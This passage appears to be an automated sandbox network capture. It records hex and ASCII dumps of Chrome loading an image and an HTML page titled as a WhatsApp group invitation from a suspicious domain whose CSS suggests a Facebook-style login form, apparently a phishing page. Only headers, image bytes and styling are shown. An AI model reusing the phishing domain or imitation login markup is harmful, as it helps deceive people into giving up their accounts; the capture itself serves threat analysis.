                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:14 UTC677INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:14 GMT
                          Content-Type: image/jpeg
                          Content-Length: 9874
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 05:16:38 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5218
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32yUnCb9mIDJJ9YehfDe9x4Ill43y1zSUwe4eiswqjKOe1SbaTXmaIh220K5a3fDEVrer8jl8h%2BxoByUjp4CoNlWZyzDf134%2Bd6LAOyV%2BAHhyIhbpQeLZ8OzsZ0kF0f%2BSeTvAXPWlyWs7DV4ydA%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972c6ffb04273-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:14 UTC692INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 09 06 07 13 13 12 15 13 12 13 15 16 15 16 18 12 15 15 18 15 15 15 15 15 16 15 17 15 16 16 15 15 15 15 18 1d 28 20 18 1a 25 1d 15 15 21 31 21 25 29 2b 2e 2e 2e 17 1f 33 38 33 2d 37 28 2d 2e 2b 01 0a 0a 0a 0e 0d 0e 17 10 10 1a 2d 1d 1d 1d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2b 2d 2d 2d 2d 2d 2d 2d ff c0 00 11 08 00 e1 00 e1 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 00 03 04 05 07 01 02 08 ff c4 00 4e 10 00 01 03 02 03 04 03 0a 08 0c 05 03 05 00 00 00 01 00 02 03 04 11 05 12 21 06 07 31 41 13 51 61 14 22 32 71 72 81 91 b1 b3 d1 35 42 53 73 92
                          Data Ascii: JFIF( %!1!%)+...383-7(-.+-------------------------------------------+-------"N!1AQa"2qr5BSs
                          2024-05-27 22:30:14 UTC1369INData Raw: e2 8e a5 12 66 31 b7 bb c8 c4 e9 b1 0a 98 20 95 82 28 9e d0 d0 62 8c 90 0b 1a ee 24 5c f1 28 6b fc e4 c5 fe 5e 3f a9 8b dc a0 ef 6d c7 fc 5e b0 7f 11 be ca 34 1c d1 74 11 e6 68 1f e7 1e 2f f2 d1 fd 4c 5e e5 3e 9f 79 58 e3 c5 db 2c 76 f9 a8 bd c8 3f 0e c1 4b 83 5d 6e 3a ad 1f 67 b0 40 63 17 09 2f 96 a3 57 15 ca 97 6f 2b 1d 06 c6 48 fe aa 2f 72 93 16 dd 6d 03 b8 49 17 d5 c3 ee 56 55 d8 48 cd 7b 68 94 50 e4 e0 12 7e a1 fe 23 be 9d 47 72 1d 56 d9 6d 0c 60 17 3e 2b 1f e1 c5 ee 51 0e f0 b1 e1 ff 00 bb 17 d5 45 ee 47 f4 4e 8e 78 ac e1 af 02 aa 2b f0 51 19 3d ed c7 22 ad b3 bd 71 51 89 83 01 23 75 d7 fd f1 05 1f bc 7c 74 71 92 3f aa 87 dc bc 8d e5 e3 9f 2b 17 d5 45 ee 56 75 b8 78 23 41 aa a0 92 8d cd 27 44 b3 aa c8 3d a7 47 0f 85 e9 b3 bd 23 10 3e 48 ff 00 42 3f
                          Data Ascii: f1 (b$\(k^?m^4th/L^>yX,v?K]n:g@c/Wo+H/rmIVUH{hP~#GrVm`>+QEGNx+Q="qQ#u|tq?+EVux#A'D=G#>HB?
                          2024-05-27 22:30:14 UTC1369INData Raw: ae 95 d2 b8 37 e2 37 ed 3d 65 66 dc 0b 98 fc ba 76 45 56 23 86 00 cb 1c 25 f7 65 ed 6b ea bc cd 7b a6 e9 25 b1 ca ac e3 a7 cc 2e 02 8c d1 2a 97 2b e1 06 ea e6 95 80 8d 42 6c 61 cf e4 d3 e8 57 18 66 18 f7 7c 5b 78 d0 16 31 ab 8e 55 88 35 5c 91 8f 6e a0 1b 22 a1 80 e9 77 1d 53 82 98 01 65 64 5f 73 4a 5e 33 b9 7b 80 b3 3a fc 53 90 42 d1 a9 2a ee b2 89 97 20 8b 75 2a 3a ca 6b 68 b3 be 3e 28 4d fa 4d 62 e3 73 93 2a ee 32 a7 19 9b 31 d3 82 8b 43 5b 94 d8 f0 4e d6 d3 91 af 25 56 e2 9f 89 02 ad 4c 3a dd 49 cf 94 b9 f5 97 93 9b 0b 83 70 55 76 0e db 57 53 76 cf 4f ed 5a b9 0d 41 02 c7 82 f7 83 b8 1a da 5f 9f 83 da b5 39 3b 98 48 84 bb 6a 2f b4 15 03 f8 ad f6 4c 4d ef 52 57 35 f4 f9 5c e1 f8 b7 70 24 7c 61 d4 a6 6d 3b 2f b4 75 00 fc a3 7d 93 15 66 f5 ea 98 f9 a1 6b
                          Data Ascii: 77=efvEV#%ek{%.*+BlaWf|[x1U5\n"wSed_sJ^3{:SB* u*:kh>(MMbs*21C[N%VL:IpUvWSvOZA_9;Hj/LMRW5\p$|am;/u}fk
                          2024-05-27 22:30:14 UTC1369INData Raw: fa 05 04 9b 17 0f f0 88 e9 a1 c2 e9 61 aa 73 1b 1c 91 b0 0c ee ca 09 75 9c 01 71 23 ad 0b ef 67 11 76 1b 48 29 a0 88 36 29 c3 9b 98 5e d7 b7 7c de 66 f6 37 04 9f 4d 95 6e fd 31 06 77 15 1c 31 3c 1c 8f 07 4e 59 62 2d ff 00 f4 14 ed e0 d5 45 5b 80 c0 ee 90 3a 46 36 9a 53 a1 b8 36 e8 de 7f 99 c9 be 1f 8b c9 fa 3f b6 f2 ec 2d f7 02 40 6f d3 60 71 4c 4f a9 fe c2 8e 7d 4e ac 6a c6 7b 71 e5 3e 50 14 6e a0 d7 57 eb 4d cd 8e b9 02 8d 88 47 b1 5d 04 18 34 3d d4 5a c8 9e ce fc b9 d6 07 39 b6 a7 97 10 15 5e f1 eb 7f c2 e8 ad 49 10 11 4f 76 97 b7 50 d7 16 e8 6f 72 6e 40 b8 e5 a7 98 d4 6f 5b 12 63 30 6a 58 62 75 ef d0 b1 d6 e4 3a 3b 9b df b5 a9 ec 52 b6 3a bd 98 00 bc 19 23 86 33 6d 6f 9a 17 ea 3e 8b 0a af 0f c6 02 e8 b2 32 6e c8 c0 b8 dd 65 54 b5 55 af 1c d9 6e 7a a1
                          Data Ascii: asuq#gvH)6)^|f7Mn1w1<NYb-E[:F6S6?-@o`qLO}Nj{q>PnWMG]4=Z9^IOvPorn@o[c0jXbu:;R:#3mo>2neTUnz
                          2024-05-27 22:30:14 UTC1369INData Raw: d5 2a 84 31 90 88 70 cc 55 bd 6a 4c 35 b7 e0 50 ac 11 d8 29 90 3e c8 4b 47 2b 98 53 25 4e 9c 50 c6 29 39 2e 22 ea de 8e ee 16 55 d8 c5 13 9b ad 94 b3 2d ae a4 0c 1e 8c 49 33 6f c0 6a 7c c8 ec c8 00 e4 00 1e 60 10 5e ce 4b df bb c4 af ea 25 1d 13 f3 0b 8c ae b8 eb 16 48 c8 37 1a 9e 8f c1 f0 05 d2 87 f5 24 dc b6 6b c1 17 04 10 78 10 6e 12 ba ce b7 7b 8b 49 d2 3a 1b 13 19 b9 17 d7 27 9d 10 e3 1b 5d 14 0f e8 c3 5c f9 34 d1 bc 2e 78 6a 85 b4 ec 1b 68 e6 1e 0d 76 2c 98 7c e6 3b 40 34 6f de 12 9d 45 95 1d 36 13 9a a5 85 be 13 25 84 f8 d9 9d a6 ca 6e 1d 5c e9 22 0f 7c 66 37 1b f7 a4 ea ac f6 4a 01 25 5b 8f ea 88 cf 9f 35 d5 62 04 3d 4b d6 22 e4 d2 bb 7b 0b 13 2a de e7 c2 f5 9e 5b 7d 9b 14 ad d0 62 02 3a e0 c3 c2 56 96 ff 00 b8 6a 14 7d ec 8f cf 15 9f 38 df 64 c4
                          Data Ascii: *1pUjL5P)>KG+S%NP)9."U-I3oj|`^K%H7$kxn{I:']\4.xjhv,|;@4oE6%n\"|f7J%[5b=K"{*[}b:Vj}8d
                          2024-05-27 22:30:14 UTC1369INData Raw: ec 6b bc a0 0a 8a dc 2a 9c 1b b6 36 82 ba c8 cf 11 c1 77 32 54 30 ee 05 06 20 7e 63 e4 81 a0 4e 51 bf bf 67 94 df 58 51 0b d7 ba 39 3f 18 cf 29 9f 78 2b b8 aa ee 62 db d8 f8 62 b3 e7 1b ec d8 87 a3 76 88 a7 79 f1 df 18 ac f2 db ec 98 87 04 16 54 dd cc 26 40 a8 1a ad 93 76 f8 ff 00 74 40 23 71 1d 24 62 c7 ac b7 91 59 15 4c 69 cc 0b 16 92 96 66 cb 19 b1 07 51 c9 c3 98 2a 56 e1 0b 13 54 fa 34 33 82 a8 da 1a 27 c8 dc ac 75 bb 57 ad 9c da 08 ea a3 0f 61 1a 8e f9 b7 d4 1e 6a e1 b1 a4 f3 eb 37 06 06 66 74 db 1a 1a fc d3 48 5f d8 ae 60 d9 4a 77 70 04 79 ca 20 96 82 ee 56 94 14 6d 68 55 37 e2 cc b8 d6 46 c0 b6 62 08 ec 72 02 7b 75 f5 a2 6c e1 a2 c0 00 07 50 b2 82 0a f7 72 8e 62 cd 9c e4 69 e6 a6 5b aa 9a b9 14 e9 95 55 49 d5 43 16 0c ab ae 97 44 1f 87 55 5f 16 a2
                          Data Ascii: k*6w2T0 ~cNQgXQ9?)x+bbvyT&@vt@#q$bYLifQ*VT43'uWaj7ftH_`Jwpy VmhU7Fbr{ulPrbi[UICDU_
                          2024-05-27 22:30:14 UTC1369INData Raw: f3 04 08 69 84 b6 5e 0c fa 39 25 c4 96 f9 92 7c cf be f8 ff 00 3b 4c 7f 72 0f 64 d4 1c c6 e8 8e 37 d4 df ce b3 79 30 7b 36 a0 d6 37 44 a2 79 8a be 4c 8e e0 a3 4b 1a 98 f6 26 cb 54 97 09 b6 4b 69 c8 b4 13 9b 8e 0c 71 f5 14 61 3c 77 0b 23 31 a2 ad 9b da 27 36 d1 4b 72 de 01 dc c7 61 4b 74 f5 11 f8 f2 d7 06 59 d7 d2 5e e3 92 93 b2 bb 23 d3 47 26 a0 65 70 f3 dc 5d 4e 92 30 75 0a e3 62 e7 ca f7 c6 78 3a c7 ce 10 a7 ea a3 36 61 1f 70 32 35 36 0e da 67 5d a6 e7 82 b1 6d 6f 25 3f 19 80 71 1e 35 40 6f 7e 0b 58 50 9f a6 77 b1 11 95 39 1d 42 1a 19 f5 4d ed 11 bc b1 11 c9 84 7d aa 25 21 e0 bd 62 33 dc 81 d4 ad 9e d6 60 d4 e1 d8 77 08 cc 8a 35 36 93 c5 f3 91 fd f0 9e 2a a6 ae ab 2c f4 ed 1c 4c d0 5f c5 d2 35 65 63 42 72 dc c1 8d ea 56 31 b8 9d 63 48 39 ba 41 c2 df 25
                          Data Ascii: i^9%|;Lrd7y0{67DyLK&TKiqa<w#1'6KraKtY^#G&ep]N0ubx:6ap256g]mo%?q5@o~XPw9BM}%!b3`w56*,L_5ecBrV1cH9A%
                          2024-05-27 22:30:14 UTC968INData Raw: 69 9e d9 0d ce b7 1c 90 bc 5b d4 6b 69 da de e4 0e aa ee 7e e4 7c c6 42 1a 63 17 ca 72 01 c6 fa a9 24 9b b6 1b 05 45 4e f9 ea 5b 2c 8e 86 0a 86 36 a2 9e 38 f2 3a 36 4a 01 63 62 73 8d 8f 84 de cb 78 94 8d 9d d9 2c 32 5a 29 6b da c7 da 08 aa db 34 53 3a ee 12 81 9a 27 9b 5a c7 2f af b1 0a 4d b6 18 9d 53 e6 74 51 9b d4 77 3e 71 0c 2e 70 cd 01 06 37 0b de c6 e3 55 2e 9f 65 b1 ea 97 4c 7a 39 da 2a 48 33 97 b9 b1 36 4e ac ed b8 f5 29 24 24 ff 00 d3 c5 6f fd 5c 1d 91 ca 3e d6 9f e8 b4 ca e7 92 82 77 61 b0 95 38 74 92 cd 50 f8 ee f6 64 0c 61 2e e7 7b 93 6b 72 45 f3 be eb 3e 4e 66 8c 40 c8 72 b2 e9 93 02 98 1a bd 88 c2 55 4d 12 24 50 29 78 6c 60 4d 1f 96 df 5a 5d 1a 7a 89 bf 8e 8f cb 6f ad 0d 72 25 96 e0 c3 24 92 49 6f 9c d9 88 6f 25 f6 c4 e5 f2 61 f6 6d 42 b5 b1
                          Data Ascii: i[ki~|Bcr$EN[,68:6Jcbsx,2Z)k4S:'Z/MStQw>q.p7U.eLz9*H36N)$$o\>wa8tPda.{krE>Nf@rUM$P)xl`MZ]zor%$Ioo%amB


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449753188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:15 UTC629OUTGET /vhsfhqpdhdsih6/ HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC592INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7dKUaMMBjOINhW4EDrG1%2BA6WbppymiI53NbbclxTO2xTp5A099ab0BraVDlDvBkkV0WKhIUBE6vPUFSn9y%2F%2B35tJSADvIDNorPJ%2BQN4e7FN30LlX1Hf11H0ZActjwfq0tlsQhxeDNSR8fFYFnyM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972ce28784299-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC777INData Raw: 33 37 62 65 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 3c 68 74 6d 6c 20 74 72 61 6e 73 6c 61 74 65 3d 22 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 55 6e 64 61 6e 67 61 6e 20 47 72 75 70 20 57 68 61 74 73 41 70 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
                          Data Ascii: 37be<html lang="en"><head><html translate="no"> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>Undangan Grup WhatsApp</title><meta name="viewport" content="width=
                          2024-05-27 22:30:16 UTC1369INData Raw: 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 65 35 34 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 69 6d 67 2f 6c 6f 67 6f 77 61 2e 70 6e 67 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
                          Data Ascii: "><meta name="apple-mobile-web-app-status-bar-style" content="#005e54"><meta name="mobile-web-app-capable" content="yes"><meta name="robots" content="noindex"><link rel="apple-touch-icon" type="image/png" href="img/logowa.png"><link rel="shortcut ico
                          2024-05-27 22:30:16 UTC1369INData Raw: 72 3a 23 66 66 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 2d 62 6f 78 2d 66 62 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 36 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 32 70 78 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 2e 74 78 74 2d 6c 6f 67 69 6e 2d 66 62 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 32 39 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74
                          Data Ascii: r:#fff; font-size: 13px; font-family: 'Roboto';}.content-box-fb img { width: 60; margin-top: 20px; margin-left: auto; margin-right: auto; border-radius: 12px; display: block;}.txt-login-fb { width: 290px; height
                          2024-05-27 22:30:16 UTC1369INData Raw: 31 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 35 37 38 65 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 64 69
                          Data Ascii: 14px; font-family: Roboto; font-weight: bold; text-align: center; text-shadow: 1px 0px rgba(0, 0, 0, 0.3); border: 1px solid #3578e5; border-radius: 5px; box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1); outline: none; di
                          2024-05-27 22:30:16 UTC1369INData Raw: 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 6c 61 6e 67 75 61 67 65 2d 6e 61 6d 65 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 30 39 34 39 63 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 30 39 34 39 63 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 66 6f 6e 74
                          Data Ascii: order-radius: 3px;}.language-name-active { color: #90949c; font-weight: bold;}.copyright { width: 40%; height: auto; margin-top: 10px; margin-left: auto; margin-right: auto; color: #90949c; font-size: 12px; font
                          2024-05-27 22:30:16 UTC1369INData Raw: 74 74 6f 6d 2d 62 61 72 7b 68 65 69 67 68 74 3a 33 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 20 2e 6d 69 64 64 6c 65 2d 62 61 72 7b 77 69 64 74 68 3a 33 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 39 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 68 65 69 67 68 74 3a 36 36 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 35 70 78 20 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 39 64 62 64 63 3b 62 6f 72 64 65 72
                          Data Ascii: ttom-bar{height:3px;background:black;width:100%;display:block}.marvel-device .middle-bar{width:3px;height:4px;top:0px;left:90px;background:black;position:absolute}.marvel-device.iphone8{width:375px;height:667px;padding:105px 24px;background:#d9dbdc;border
                          2024-05-27 22:30:16 UTC1369INData Raw: 72 7b 68 65 69 67 68 74 3a 31 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 62 66 62 66 63 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 36 38 70 78 3b 6c 65 66 74 3a 30 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 20 2e 73 6c 65 65 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 39 30 70 78 3b 72 69 67 68 74 3a 2d 34 70 78 3b 77 69 64 74 68 3a 34 70 78 3b 68 65 69 67 68 74 3a 36 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 70 78 20 32 70 78 20 32 70 78 20 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 39 64 62 64 63 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 20 2e 76 6f 6c 75 6d 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c
                          Data Ascii: r{height:14px;background:#bfbfc0;position:absolute;bottom:68px;left:0}.marvel-device.iphone8 .sleep{position:absolute;top:190px;right:-4px;width:4px;height:66px;border-radius:0px 2px 2px 0px;background:#d9dbdc}.marvel-device.iphone8 .volume{position:absol
                          2024-05-27 22:30:16 UTC1369INData Raw: 75 6e 64 3a 23 66 39 65 37 64 33 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 67 6f 6c 64 20 2e 68 6f 6d 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 65 62 62 61 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 20 23 63 65 62 62 61 39 20 30 25 2c 20 23 66 39 65 37 64 33 20 35 30 25 2c 20 23 63 65 62 62 61 39 20 31 30 30 25 29 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 62 6c 61 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 36 34 36 34 36 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 33 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 37 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20
                          Data Ascii: und:#f9e7d3}.marvel-device.iphone8.gold .home{background:#cebba9;background:linear-gradient(135deg, #cebba9 0%, #f9e7d3 50%, #cebba9 100%)}.marvel-device.iphone8.black{background:#464646;-webkit-box-shadow:inset 0 0 3px 0 rgba(0,0,0,0.7);box-shadow:inset
                          2024-05-27 22:30:16 UTC1369INData Raw: 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 20 32 70 78 20 30 70 78 20 30 70 78 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 6c 61 6e 64 73 63 61 70 65 20 2e 76 6f 6c 75 6d 65 3a 61 66 74 65 72 7b 6c 65 66 74 3a 2d 38 32 70 78 3b 77 69 64 74 68 3a 36 36 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 20 32 70 78 20 30 70 78 20 30 70 78 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 6c 61 6e 64 73 63 61 70 65 20 2e 74 6f 70 2d 62 61 72 7b 77 69 64 74 68 3a 31 34 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 36 38 70 78 20 2d 20 20 31 34 70 78 29 3b 74 6f 70 3a 30 7d 2e
                          Data Ascii: :auto;border-radius:2px 2px 0px 0px}.marvel-device.iphone8.landscape .volume:after{left:-82px;width:66px;height:4px;top:0;border-radius:2px 2px 0px 0px}.marvel-device.iphone8.landscape .top-bar{width:14px;height:100%;left:calc(100% - 68px - 14px);top:0}.
                          2024-05-27 22:30:16 UTC1369INData Raw: 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 69 6e 73 65 74 20 30 20 30 20 36 70 78 20 33 70 78 20 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 70 6c 75 73 20 2e 68 6f 6d 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 77 69 64 74 68 3a 36 38 70 78 3b 68 65 69 67 68 74 3a 36 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 33 34 70 78 3b 62 6f 74 74 6f 6d 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 33 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 30 33 32 33 33 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 20 23 33 30 33 32 33
                          Data Ascii: x 0 rgba(0,0,0,0.1),inset 0 0 6px 3px #fff;z-index:2}.marvel-device.iphone8plus .home{border-radius:100%;width:68px;height:68px;position:absolute;left:50%;margin-left:-34px;bottom:24px;z-index:3;background:#303233;background:linear-gradient(135deg, #30323


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449751188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
